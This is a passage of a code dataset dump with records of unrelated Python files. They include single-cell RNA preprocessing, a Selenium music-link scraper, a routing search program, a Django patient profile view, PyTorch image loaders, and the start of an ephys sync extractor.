import Pipeline\nfrom sklearn.neighbors import kneighbors_graph\nfrom backbone import nearest_neighbor\n\ndef process_adata(adata, noise=0.0):\n\n scv.pp.filter_and_normalize(adata, flavor = 'cell_ranger', min_shared_counts=0, n_top_genes=300, log=True)\n if adata.n_vars > 299:\n adata = adata[:,:299]\n elif adata.n_vars < 299:\n raise ValueError(\"Feature number\", adata.n_vars)\n\n print(adata.X.shape)\n\n scv.pp.moments(adata, n_pcs=30, n_neighbors=30)\n scv.tl.velocity(adata, mode='stochastic') \n\n adata2 = adata.copy()\n # dpt\n adata.uns['iroot'] = 0\n sc.tl.diffmap(adata)\n sc.tl.dpt(adata)\n #velo-dpt\n scv.tl.velocity_graph(adata2)\n scv.tl.velocity_pseudotime(adata2)\n y_dpt = adata.obs['dpt_pseudotime'].to_numpy()\n y_vdpt = adata2.obs['velocity_pseudotime'].to_numpy()\n\n X_spliced = adata.X.toarray()\n\n pipeline = Pipeline([('pca', PCA(n_components=30, svd_solver='arpack'))])\n X_pca = pipeline.fit_transform(X_spliced)\n\n conn, G = nearest_neighbor(X_pca, k=10, sigma=3)\n\n # X_spliced is original, X_pca is after pca\n x = X_spliced.copy()\n x = StandardScaler().fit_transform(x)\n x = torch.FloatTensor(x.copy())\n\n # X_pca_pre is after pca\n # v = StandardScaler().fit_transform(X_pre)\n # v = torch.FloatTensor(v)\n\n # Simulation time label\n y = adata.obs['sim_time'].to_numpy().reshape((-1, 1))\n scaler = MinMaxScaler((0, 1))\n scaler.fit(y)\n y = torch.FloatTensor(scaler.transform(y).reshape(-1, 1))\n\n # Graph type label\n # y = torch.LongTensor(np.where(np.array(backbones) == bb)[0])\n\n edge_index = np.array(np.nonzero(conn))\n edge_index = torch.LongTensor(edge_index)\n\n adj = conn.copy()\n\n data = Data(x=x, edge_index=edge_index, y=y, adj=adj, y_dpt = y_dpt, y_vdpt = y_vdpt, noise=noise)\n print(x.shape)\n return data\n\ndef process_adata_novelo(adata, noise=0.0):\n sc.pp.filter_genes(adata, min_counts = 0)\n sc.pp.normalize_per_cell(adata)\n sc.pp.filter_genes_dispersion(adata, n_top_genes= 300)\n sc.pp.log1p(adata)\n if adata.n_vars > 299:\n adata = adata[:,:299]\n elif adata.n_vars < 299:\n raise ValueError(\"Feature number\", adata.n_vars)\n\n print(adata.X.shape)\n\n X_spliced = adata.X.toarray()\n\n pipeline = Pipeline([('pca', PCA(n_components=30, svd_solver='arpack'))])\n X_pca = pipeline.fit_transform(X_spliced)\n\n conn, G = nearest_neighbor(X_pca, k=10, sigma=3)\n\n # X_spliced is original, X_pca is after pca\n x = X_spliced.copy()\n x = StandardScaler().fit_transform(x)\n x = torch.FloatTensor(x)\n\n # Simulation time label\n y = adata.obs['sim_time'].to_numpy().reshape((-1, 1))\n scaler = MinMaxScaler((0, 1))\n scaler.fit(y)\n y = torch.FloatTensor(scaler.transform(y).reshape(-1, 1))\n\n # Graph type label\n # y = torch.LongTensor(np.where(np.array(backbones) == bb)[0])\n\n edge_index = np.array(np.nonzero(conn))\n edge_index = torch.LongTensor(edge_index)\n\n adj = conn.copy()\n\n data = Data(x=x, edge_index=edge_index, y=y, adj=adj, noise=noise)\n print(x.shape)\n return data\n\ndef technological_noise(count_mt, capture_rate = 0.2):\n \n X = count_mt.astype('int')\n libsize_cell = [np.sum(X[cell,:]) for cell in range(X.shape[0])]\n\n gene_indices = [[0 for gene in range(libsize_cell[cell])] for cell in range(X.shape[0])]\n sampled_genes = []\n \n for cell_id, gene_idx in enumerate(gene_indices):\n subsample = np.random.uniform(0.0, 1.0, size = len(gene_indices)) > (1-capture_rate)\n sampled_genes.append(subsample)\n idx = 0\n for gene_id, gene_num in enumerate(X[cell_id,:]):\n count = np.sum(subsample[idx:(idx + int(gene_num))])\n X[cell_id, gene_id] = count\n \n return X\n\ndef calculate_adj(conn, x, v):\n adj = np.full_like(conn, np.nan)\n for i in range(conn.shape[0]):\n # self loop\n adj[i][i] = 0\n\n indices = conn[i,:].nonzero()[0]\n for k in indices:\n diff = x[i, :] - x[k, :] # 1,d\n distance = np.linalg.norm(diff, ord=2) #1\n # penalty = np.dot(diff, velo_matrix[k, :, None]) / np.linalg.norm(velo_matrix[k,:], ord=2) / distance\n penalty = np.dot(diff, v[k, :, None]) / np.linalg.norm(v[k,:], ord=2) / distance\n penalty = 0 if np.isnan(penalty) else penalty\n adj[i][k] = penalty\n return adj\n\ndef pca_op(X, n_comps = 2, standardize = True):\n \"\"\"\\\n Calculate the PCA\n \"\"\"\n from sklearn.preprocessing import StandardScaler\n from sklearn.pipeline import Pipeline\n from sklearn.decomposition import PCA\n if standardize:\n pipeline = Pipeline([('standardize', StandardScaler()), ('pca', PCA(n_components=n_comps))])\n else:\n pipeline = Pipeline([('pca', PCA(n_components=n_comps))])\n X_pca = pipeline.fit_transform(X)\n return X_pca\n\ndef umap_op(X, n_comps = 2):\n \"\"\"\\\n Calculate the umap\n \"\"\"\n from umap import UMAP\n Umap = UMAP(n_components=n_comps)\n X_umap = Umap.fit_transform(X)\n return X_umap\n\ndef kendalltau(y_pred, y_label):\n from scipy.stats import kendalltau\n if isinstance(y_label, torch.Tensor):\n y_label = y_label.numpy().squeeze()\n else:\n y_label = y_label.squeeze()\n if isinstance(y_pred, torch.Tensor):\n y_pred = y_pred.numpy().squeeze()\n else:\n y_pred = y_pred.squeeze()\n tau, p_val = kendalltau(y_pred, y_label)\n return tau\n\ndef pearson(y_pred, y_label):\n if isinstance(y_label, torch.Tensor):\n y_label = y_label.numpy().squeeze()\n else:\n y_label = y_label.squeeze()\n if isinstance(y_pred, torch.Tensor):\n y_pred = y_pred.numpy().squeeze()\n else:\n y_pred = y_pred.squeeze()\n\n vx = y_pred - np.mean(y_pred)\n vy = y_label - np.mean(y_label)\n score = np.sum(vx * vy) / (np.sqrt(np.sum(vx ** 2)) * np.sqrt(np.sum(vy ** 2)))\n return score\n\ndef scatter(model, data, figsize = (15,5), method = 'pca', coloring = \"order\", metric = \"kendall_tau\", knn=False, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n model.eval()\n # X should be something before pca\n if isinstance(data.x, torch.Tensor):\n X = data.x.numpy()\n elif isinstance(data.x, np.ndarray):\n X = data.x\n else:\n raise ValueError('tensor or numpy array')\n \n if isinstance(data.y, torch.Tensor):\n y = data.y.numpy().squeeze()\n elif isinstance(data.y, np.ndarray):\n y = data.y\n else:\n raise ValueError('tensor or numpy array')\n if method == 'pca':\n X_pca = pca_op(X, n_comps = 2, standardize=False)\n elif method == 'umap':\n X_pca = umap_op(X, n_comps = 2)\n else:\n raise ValueError(\"either pca or umap\")\n \n data = data.to(device)\n pred,_,_ = model(data)\n\n pred = pred.detach().cpu().numpy().reshape(-1)\n\n if knn: \n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(30, 10))\n ax3.set_title('knn')\n else:\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=figsize)\n\n if metric == \"kendall_tau\":\n loss = kendalltau(pred, y)\n ax1.set_title(\"Prediction, kendalltau=\"+str(loss)[:5] + \" data noise=\"+str(data.noise[0]))\n elif metric == \"pearson\":\n loss = pearson(pred, y)\n ax1.set_title(\"Prediction, pearson=\"+str(loss)[:5] + \" data noise=\"+str(data.noise[0]))\n\n else:\n loss = mean_squared_error(y, pred)\n ax1.set_title(\"Prediction, rmse=\"+str(loss)[:5])\n\n ax2.set_title(\"Ground Truth\")\n\n if coloring == \"order\":\n y_sorted = sorted(y)\n y = [y_sorted.index(i) for i in y]\n\n pred_sorted = sorted(pred)\n pred = [pred_sorted.index(i) for i in pred]\n\n v1 = ax1.scatter(X_pca[:,0],X_pca[:,1], cmap = 'gnuplot', c=pred)\n fig.colorbar(v1, fraction=0.046, pad=0.04, ax = ax1)\n\n v2 = ax2.scatter(X_pca[:,0],X_pca[:,1], cmap = 'gnuplot', c=y)\n fig.colorbar(v1, fraction=0.046, pad=0.04, ax = ax2)\n\n if knn:\n edges = data.edge_index.cpu().numpy()\n for i in range(edges.shape[1]):\n ax3.plot(X_pca[edges[:,i]][:,0], X_pca[edges[:,i]][:,1])\n plt.show()","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"314007967","text":"import time,re\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport pandas as pd\n\ndef spider(artist):\n driver = webdriver.Chrome()\n driver.implicitly_wait(5)\n driver.get(\"http://tool.liumingye.cn/music/?page=searchPage\")\n\n input_tag = driver.find_element_by_id('input')\n input_tag.send_keys('周杰伦')\n input_tag.send_keys(Keys.ENTER)\n\n download_icons = driver.find_elements_by_class_name('init')\n for item in download_icons:\n # Attention:class name 中包含空格时会出现BUG,用CSS选择器可以实现\n downloader_icon = item.find_element_by_css_selector(\"[class='aplayer-list-download iconfont icon-xiazai']\")\n downloader_icon.click()\n links = driver.find_elements_by_css_selector(\"[class='btn btn-outline-secondary download']\")\n\n # 解析完成下载链接之后,要关闭dialog,返回上一级,从而实现遍历\n for link in links:\n\n print(link.get_attribute('outerHTML'))\n\n\n time.sleep(2)\n driver.quit()\n\n\n#spider(' ')\n\n\n\n# token_m=re.compile('resourceType=')\n# musical_urls=[['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=LQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=2&channel=0'], ['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=PQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=2&channel=0'], ['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=HQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=2&channel=0'], ['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=SQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=E&channel=0'], [], [], []]\n# musical_urls=list(filter(None,musical_urls))\n# musical_urls=[musical_url[0] for musical_url in musical_urls]\n#\n# for url in musical_urls:\n# type_pos=token_m.search(url).span()[1]\n# type=url[type_pos:type_pos+1]\n#\n#\n#\n# print(type)\n\ndownload_df = pd.DataFrame(columns=['Artist', 'Music_name', 'Quality', 'Url'])\na=['a']*4\ndownload_df['Artist']=a\nprint(download_df)","sub_path":"Reference.py","file_name":"Reference.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385726454","text":"import os\nfrom typing import Optional, Sequence\n\nfrom csr.tabular_file_reader import TabularFileReader\nfrom sources2csr.ngs import NGS, LibraryStrategy\nfrom sources2csr.ngs_reader import NgsReader, ReaderException\n\n\nclass NgsTxtReader(NgsReader):\n \"\"\" Reads .txt files with Continuous CNA per gene and Discrete CNA per gene data.\n \"\"\"\n\n def __init__(self, input_dir: str):\n super().__init__(input_dir, LibraryStrategy.CNV)\n\n def read_data(self, filename: str) -> Optional[Sequence[NGS]]:\n \"\"\" Reads .txt file.\n Sample_id should be specified in the header. Assumes that the IDs will start with 'PMC'.\n\n :param filename: name of the input file\n :return: Sequence of NGS objects\n \"\"\"\n data = TabularFileReader(os.path.join(self.input_dir, filename)).read_data()\n biosource_biomaterial_dict = dict()\n if data:\n sample_id_col_num = 0\n for col_value in data[0]:\n if col_value.startswith('PMC'):\n sample_id_col_num += 1\n biosource_biomaterial = self.biosource_biomaterial_from_sample_id(col_value, filename)\n biosource_biomaterial_dict.setdefault(biosource_biomaterial[0], []).append(biosource_biomaterial[1])\n if sample_id_col_num == 0:\n raise ReaderException(\"Cannot read NGS data from file: {}. No sample_id found in header\"\n .format(filename))\n else:\n raise ReaderException(\"Cannot read NGS data from file: {}. Empty data.\".format(filename))\n return self.map_ngs(biosource_biomaterial_dict, filename)\n","sub_path":"sources2csr/ngs_txt_reader.py","file_name":"ngs_txt_reader.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"108159320","text":"import matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom functools import partial\nfrom collections import namedtuple, OrderedDict\nfrom typing import Any, Dict, List, Optional\n\nfrom adaptiveleak.utils.constants import POLICIES, ENCODING\nfrom adaptiveleak.utils.file_utils import read_json_gz\nfrom adaptiveleak.analysis.plot_utils import COLORS, to_label, geometric_mean, MARKER, MARKER_SIZE, LINE_WIDTH, PLOT_STYLE\nfrom adaptiveleak.analysis.plot_utils import PLOT_SIZE, AXIS_FONT, LEGEND_FONT, TITLE_FONT\nfrom adaptiveleak.analysis.plot_utils import extract_results, iterate_policy_folders, dataset_label, get_multiplier\n\n\ndef plot(sim_results: Dict[str, Dict[float, float]], dataset_name: str, output_file: Optional[str], is_group_comp: bool, metric: str, include_skip_rnn: bool):\n\n with plt.style.context(PLOT_STYLE):\n fig, ax = plt.subplots(figsize=(PLOT_SIZE[0], PLOT_SIZE[1] * 0.75))\n\n labels: List[str] = []\n agg_errors: List[float] = []\n\n policy_names = ['adaptive_heuristic', 'adaptive_deviation'] if is_group_comp else POLICIES\n\n if not include_skip_rnn:\n policy_names = list(filter(lambda t: not t.startswith('skip_rnn'), policy_names))\n\n encoding_names = ['single_group', 'group_unshifted', 'pruned', 'group'] if is_group_comp else ['standard', 'padded', 'group']\n\n for name in policy_names:\n encodings = encoding_names if name not in ('uniform', 'random') else ['standard']\n\n for encoding in encodings:\n\n policy_name = '{0}_{1}'.format(name, encoding)\n\n if (policy_name not in sim_results) and (name not in sim_results):\n continue\n\n if name in sim_results:\n policy_name = name\n\n model_results = sim_results[policy_name]\n energy_per_seq = list(sorted(model_results.keys()))\n errors = [model_results[e] for e in energy_per_seq]\n\n if name != 'random' and encoding != 'padded':\n ax.plot(energy_per_seq, errors, marker=MARKER, linewidth=LINE_WIDTH, markersize=MARKER_SIZE, label=to_label(policy_name), color=COLORS[policy_name])\n\n avg = np.average(errors)\n if metric in ('norm_mae', 'norm_rmse'):\n avg = avg * 100\n\n agg_errors.append(avg)\n\n if encoding == 'standard':\n labels.append(name)\n else:\n labels.append(policy_name)\n\n min_error = np.argmin(agg_errors)\n print(' & '.join(labels))\n print(' & '.join((('{0:.5f}'.format(x) if i != min_error else '\\\\textbf{{{0:.5f}}}'.format(x)) for i, x in enumerate(agg_errors))))\n\n ax.set_xlabel('Energy Budget (Average mJ / Seq)', fontsize=AXIS_FONT)\n ax.set_ylabel(metric.upper(), fontsize=AXIS_FONT)\n ax.set_title('Sampling Error on the {0} Dataset'.format(dataset_label(dataset_name)), fontsize=TITLE_FONT)\n\n ax.legend(fontsize=LEGEND_FONT)\n\n if output_file is None:\n plt.show()\n else:\n plt.savefig(output_file, bbox_inches='tight', transparent=True)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--folder', type=str, required=True, help='The name of the folder holding the experiment logs.')\n parser.add_argument('--dataset', type=str, required=True, help='The dataset name.')\n parser.add_argument('--metric', type=str, choices=['mae', 'rmse'], required=True, help='The error metric to use.')\n parser.add_argument('--output-file', type=str, help='An optional output file in which to save the plot.')\n parser.add_argument('--is-group-comp', action='store_true', help='Whether to use variants of AGE [default: no].')\n parser.add_argument('--include-skip-rnn', action='store_true', help='Whether to include Skip RNNs [default: no)].')\n args = parser.parse_args()\n\n extract_fn = partial(extract_results, field=args.metric, aggregate_mode=None)\n policy_folders = list(iterate_policy_folders([args.folder], dataset=args.dataset))\n\n sim_results = {name: res for name, res in map(extract_fn, policy_folders)}\n plot(sim_results, output_file=args.output_file, dataset_name=args.dataset, metric=args.metric, is_group_comp=args.is_group_comp, include_skip_rnn=args.include_skip_rnn)\n","sub_path":"adaptiveleak/analysis/plot_error.py","file_name":"plot_error.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423884685","text":"#!/usr/local/bin/python3\n\n# put your routing program here!\n\nfrom sys import argv\n\nfrom pprint import pprint\n\nfrom utils import *\n\nsegments_file = \"road-segments.txt\"\ngps_file = \"city-gps.txt\"\ngraph = make_connectivity_graph(segments_file)\ngps_graph = make_gps_graph(gps_file)\npopulate_coords_for_empty(graph, gps_graph)\n\ncity1 = argv[1]\ncity2 = argv[2]\nmethod = argv[3].lower()\n\ndef make_segment_search_move(fringe, end_city=None, gps_graph=None):\n if end_city is None:\n fringe_item = fringe[0]\n next_city = fringe_item['next_cities'].pop(0)\n connected_cities = get_connected_cities(graph, next_city)\n fringe.append(\n create_fringe_object(\n fringe_item['path']+(next_city,),\n connected_cities,\n 0\n )\n )\n if not fringe_item['next_cities']:\n fringe.pop(0)\n return next_city\n\n #this uses gps heuristic\n fringe_item = fringe[0]\n current_city = fringe_item['path'][-1]\n base_slope = get_slope(gps_graph,current_city, end_city)\n move_index = 0\n min_diff = 99999\n for index, city in enumerate(fringe_item['next_cities']):\n current_diff = base_slope - get_slope(gps_graph, city, end_city)\n if current_diff < min_diff:\n min_diff = current_diff\n move_index = index\n\n next_city = fringe_item['next_cities'].pop(index)\n\n connected_cities = get_connected_cities(graph, next_city)\n fringe.append(\n create_fringe_object(\n fringe_item['path']+(next_city,),\n connected_cities,\n 0\n )\n )\n\n return next_city\n\n\ndef segment_seach(graph, start_city_name, end_city_name):\n\n connected_cities = get_connected_cities(graph, start_city_name)\n fringe = [\n create_fringe_object(\n (start_city_name,),\n connected_cities,\n 0\n ),\n ]\n continue_traversal = True if connected_cities else False\n solution_found = False\n moves = 0\n\n while continue_traversal:\n while not fringe[0]['next_cities']:\n fringe.pop(0)\n if fringe and fringe[0]['next_cities']:\n next_city = make_segment_search_move(\n fringe, end_city_name, gps_graph\n )\n moves += 1\n if next_city == end_city_name:\n continue_traversal = False\n solution_found = True\n else:\n continue_traversal = False\n # print(\"moves: \", moves)\n\n if solution_found:\n return fringe[-1]\n\ndef get_city_distance_from_graph(\n fringe_item, current_city_index, next_city_index\n):\n current_city_name = fringe_item['path'][current_city_index]\n next_city_name = fringe_item['next_cities'][next_city_index]\n dist = fringe_item['distance'] + graph[current_city_name][\n next_city_name\n ]['distance']\n return dist\n\ndef get_speed(fringe_item, current_city_index, next_city_index):\n current_city_name = fringe_item['path'][current_city_index]\n next_city_name = fringe_item['next_cities'][next_city_index]\n segment = graph[current_city_name][\n next_city_name\n ]\n dist = fringe_item['distance'] + (\n segment['distance'] / float(segment['speed_limit'])\n )\n return dist\n\ndef best_milage(fringe_item, current_city_index, next_city_index):\n current_city_name = fringe_item['path'][current_city_index]\n next_city_name = fringe_item['next_cities'][next_city_index]\n segment = graph[current_city_name][\n next_city_name\n ]\n mil = get_milage(float(segment['speed_limit']))\n dist = fringe_item['distance'] + mil\n return dist\n\ndef traverse(fringe, end_city_name, func_to_use, gps_graph):\n weight1 = 8\n weight2 = 2\n if not fringe:\n #no moves remaining, returning\n return None, False\n fringe_item = None\n\n pop_list = []\n for index, fringe_item in enumerate(fringe):\n if not fringe_item['next_cities']:\n pop_list.append(index)\n if fringe_item['next_cities']:\n best_move = create_next_move_obj(\n index,(\n func_to_use(\n fringe_item, -1, 0\n ) * weight1 + get_slope(\n gps_graph,\n fringe_item['path'][-1],\n fringe_item['next_cities'][0],\n ) * weight2\n )\n , 0\n )\n\n for pop in pop_list:\n fringe.pop(pop)\n\n for fringe_item_index, fringe_item in enumerate(fringe):\n if end_city_name in fringe_item['next_cities']:\n end_city_index = fringe_item['next_cities'].index(end_city_name)\n\n best_move = create_next_move_obj(\n fringe_item_index,\n (func_to_use(\n fringe_item, -1, end_city_index\n ) * weight1 + get_slope(\n gps_graph,\n fringe_item['path'][-1],\n fringe_item['next_cities'][end_city_index],\n ) * weight2\n ),\n end_city_index\n )\n\n #return reached true if final city reached\n return best_move, True\n\n for city_index, city in enumerate(fringe_item['next_cities']):\n next_move = create_next_move_obj(\n fringe_item_index,\n (func_to_use(\n fringe_item, -1, city_index\n ) * weight1 + get_slope(\n gps_graph,\n fringe_item['path'][-1],\n fringe_item['next_cities'][city_index],\n ) * weight2\n ),\n city_index\n )\n if (next_move['distance'] < best_move['distance']\n # and fringe_item['next_moves']\n ):\n best_move = next_move\n #return reached False as final city not reached\n return best_move, False\n\ndef make_move_on_distance(fringe, next_move):\n fringe_item_index = next_move['fringe_item_index']\n distance = next_move['distance']\n next_move_index = next_move['next_move_index']\n\n fringe_item = fringe[fringe_item_index]\n next_city = fringe_item['next_cities'][next_move_index]\n connected_cities = get_connected_cities(graph, next_city)\n next_fringe_item = create_fringe_object(\n fringe_item['path']+(next_city,), connected_cities, distance\n )\n fringe.append(next_fringe_item)\n fringe_item['next_cities'].pop(next_move_index)\n if not fringe_item['next_cities']:\n fringe.pop(fringe_item_index)\n return next_fringe_item\n\n\n\ndef road_trip(graph, start_city_name, end_city_name, heuristic, gps_graph):\n if (end_city_name not in graph.keys()\n or start_city_name not in graph.keys()):\n return\n connected_cities = get_connected_cities(graph, start_city_name)\n fringe = [\n create_fringe_object(\n (start_city_name,),\n connected_cities,\n 0\n ),\n ]\n continue_traversal = True if connected_cities else False\n solution_found = False\n moves = 0\n\n while continue_traversal:\n\n if heuristic == 1:\n #distance\n fn_to_use = get_city_distance_from_graph\n elif heuristic == 2:\n #speed\n fn_to_use = get_speed\n elif heuristic == 3:\n #speed\n fn_to_use = best_milage\n\n\n next_move, reached = traverse(\n fringe, end_city_name, fn_to_use, gps_graph\n )\n if not next_move:\n continue_traversal = False\n return\n #TODO remove fringe items when when no next move\n #DO above in make move case\n solution = make_move_on_distance(fringe, next_move)\n if reached:\n continue_traversal = False\n solution_found = True\n moves+=1\n\n # if moves%500==0:\n # print(\"moves: \", moves)\n # print(\"moves: \", moves)\n if solution_found:\n return solution\n\nif method == 'segments':\n get_formatted_output_from_frige_item(\n graph, segment_seach(graph, city1, city2)\n )\nelif method == 'distance':\n get_formatted_output_from_frige_item(\n graph, road_trip(graph, city1, city2, 1, gps_graph)\n )\nelif method == 'time':\n get_formatted_output_from_frige_item(\n graph, road_trip(graph, city1, city2, 2, gps_graph)\n )\nelif method == 'mpg':\n get_formatted_output_from_frige_item(\n graph, road_trip(graph, city1, city2, 3, gps_graph)\n )\n","sub_path":"Implementation of A-star algorithm with heuristics, Knapsack variant using DP and Branch and Bound Technique/part2/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":8586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44131110","text":"import glob\nimport torchvision.transforms as transforms\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport random\n\n\nclass CustomDataset(Dataset):\n def __init__(self, image_dir, label_dir, img_format, lab_format, task='train', size = (256, 512)):\n images = glob.glob(r'./data/{}/{}/*/*{}'.format(image_dir, task, img_format))\n labels = glob.glob(r'./data/{}/{}/*/*{}'.format(label_dir, task, lab_format))\n images.sort()\n labels.sort()\n self.data = list(zip(images, labels))\n self.transforms1 = transforms.Compose([transforms.Resize(size, Image.BILINEAR),\n transforms.ToTensor(),\n transforms.Normalize((.485, .456, .406), (.229, .224, .225)),])\n self.transforms2 = transforms.Resize(size, Image.NEAREST)\n\n def __getitem__(self, index):\n image_path, label_path = self.data[index]\n image = Image.open(image_path)\n label = Image.open(label_path)\n image, label = self.__randomtransform__(image, label)\n image = self.transforms1(image)\n label = torch.LongTensor(np.array(self.transforms2(label)).astype('int32'))\n return image, label, image_path.rsplit('/',1)[1]\n\n def __len__(self):\n return len(self.data)\n\n def __randomtransform__(self, img, label):\n if random.random()<0.5:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n label = label.transpose(Image.FLIP_LEFT_RIGHT)\n if random.random()<0.5:\n img = img.transpose(Image.FLIP_TOP_BOTTOM)\n label = label.transpose(Image.FLIP_LEFT_RIGHT)\n return img, label\n\nclass TestDataset(Dataset):\n def __init__(self, image_dir, img_format, size = (256, 512)):\n self.images = glob.glob(r'./data/{}/*{}'.format(image_dir, img_format))\n self.transforms1 = transforms.Compose([transforms.Resize(size, Image.BILINEAR),\n transforms.ToTensor(),\n transforms.Normalize((.485, .456, .406), (.229, .224, .225)),])\n\n def __getitem__(self, index):\n image_path = self.images[index]\n image = Image.open(image_path)\n image = self.__randomtransform__(image)\n image = self.transforms1(image)\n return image, image_path.rsplit('/',1)[1]\n\n def __len__(self):\n return len(self.images)\n\n def __randomtransform__(self, img):\n if random.random()<0.5:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n if random.random()<0.5:\n img = img.transpose(Image.FLIP_TOP_BOTTOM)\n return img","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"69326479","text":"from functions.inputs import get_input\n\ndef calculo_potencia(base = 2, exponente = 0, limite = 1):\n resultado = 0\n\n while resultado < limite:\n resultado = base ** exponente\n print(f\"{base} elevado a {exponente} es igual a: {resultado}\")\n exponente += 1\n\n\ndef run():\n LIMITE = get_input(int, \"Numero maximo ?: \", \"un numero valido\")\n calculo_potencia(limite=LIMITE)\n\n\nif __name__ == '__main__':\n run()","sub_path":"bucle.py","file_name":"bucle.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"103899366","text":"from diffusers import StableDiffusionPipeline\r\nfrom huggingface_hub import notebook_login\r\nnotebook_login()\r\n\r\n\r\nexperimental_pipe = StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", revision=\"fp16\", use_auth_token=True)\r\ndescription_1 = \"a photograph of an horse on moon\"\r\nimage_1 = experimental_pipe(description_1).images[0]\r\nimage_1\r\nimage_1.save(\"description_1_based_image.png\")\r\n\r\n","sub_path":"AI & ML/Image_generation_from_caption.py","file_name":"Image_generation_from_caption.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"554087105","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\nfrom hms.models import Person\nfrom .models import Patient\nfrom doctor.models import Prescription\n\n\ndef profile(request):\n user = request.user\n user = User.objects.get(username=user)\n person = Person.objects.get(user=user)\n users = {\n 'firstname': request.user.first_name,\n 'lastname': request.user.last_name,\n 'email': request.user.email,\n }\n print(users)\n if request.method == 'POST':\n phone = request.POST['phone']\n gender = request.POST['gender']\n address = request.POST['address']\n age = request.POST['age']\n \n if phone and gender and address and age:\n if Patient.objects.filter(person=person).exists():\n patient = Patient.objects.get(person=person)\n patient_val = Patient.objects.filter(person=person).update(person=person, phone=phone, gender=gender, address=address, age=age)\n return render(request, 'patient/profile.html', {'patient': patient, 'users': users, 'person': person})\n\n obj = Patient.objects.create(person=person, phone=phone, gender=gender, age=age, address=address)\n obj.save()\n\n return render(request, 'patient/profile.html', {'patient': patient, 'users': users, 'person': person})\n else:\n print(\"Error Occured: \",phone,gender,address,age)\n patient = Patient.objects.filter(person=person)\n if Patient.objects.filter(person=person).exists():\n patient = Patient.objects.filter(person=person)[0]\n return render(request, 'patient/profile.html', {'patient': patient, 'users': users, 'person': person})\n else:\n return render(request, 'patient/profile.html', {'patient': None, 'users': users, 'person': person})\n\n\ndef medsHistory(request):\n person = Person.objects.get(user = User.objects.get(username=request.user))\n patient = Patient.objects.get(person=person)\n prescriptions = Prescription.objects.filter(patient=patient).order_by('date')\n return render(request, 'patient/medicalHistory.html', {\n 'person': person, 'prescriptions': prescriptions\n })\n\n\n","sub_path":"patient/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72505990","text":"import logging\nimport tempfile\nfrom pathlib import Path\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport ibllib.plots as plots\nimport ibllib.behaviour.wheel as whl\nimport ibllib.io\nimport ibllib.dsp as dsp\nimport alf.io\n\n_logger = logging.getLogger('ibllib')\n\nSYNC_BATCH_SIZE_SAMPLES = 2 ** 18 # number of samples to read at once in bin file for sync\nWHEEL_RADIUS_CM = 3.1\nWHEEL_TICKS = 1024\nDEBUG_PLOTS = False\n# this is the mapping of synchronisation pulses coming out of the FPGA\nAUXES = [\n (0, None),\n (1, None),\n (2, 'left_camera'),\n (3, 'right_camera'),\n (4, 'body_camera'),\n (5, None),\n (6, None),\n (7, 'bpod'),\n (8, None),\n (9, None),\n (10, None),\n (11, None),\n (12, 'frame2ttl'),\n (13, 'rotary_encoder_0'),\n (14, 'rotary_encoder_1'),\n (15, 'audio'),\n]\nSYNC_CHANNEL_MAP = {}\nfor aux in AUXES:\n if aux[1]:\n SYNC_CHANNEL_MAP[aux[1]] = aux[0]\n\n\ndef _sync_to_alf(raw_ephys_apfile, output_path=None, save=False):\n \"\"\"\n Extracts sync.times, sync.channels and sync.polarities from binary ephys dataset\n\n :param raw_ephys_apfile: bin file containing ephys data or spike\n :param out_dir: output directory\n :return:\n \"\"\"\n if not output_path:\n file_ftcp = tempfile.TemporaryFile()\n else:\n file_ftcp = Path(output_path) / 'fronts_times_channel_polarity.bin'\n if isinstance(raw_ephys_apfile, ibllib.io.spikeglx.Reader):\n sr = raw_ephys_apfile\n else:\n sr = ibllib.io.spikeglx.Reader(raw_ephys_apfile)\n # loop over chunks of the raw ephys file\n wg = dsp.WindowGenerator(sr.ns, SYNC_BATCH_SIZE_SAMPLES, overlap=1)\n fid_ftcp = open(file_ftcp, 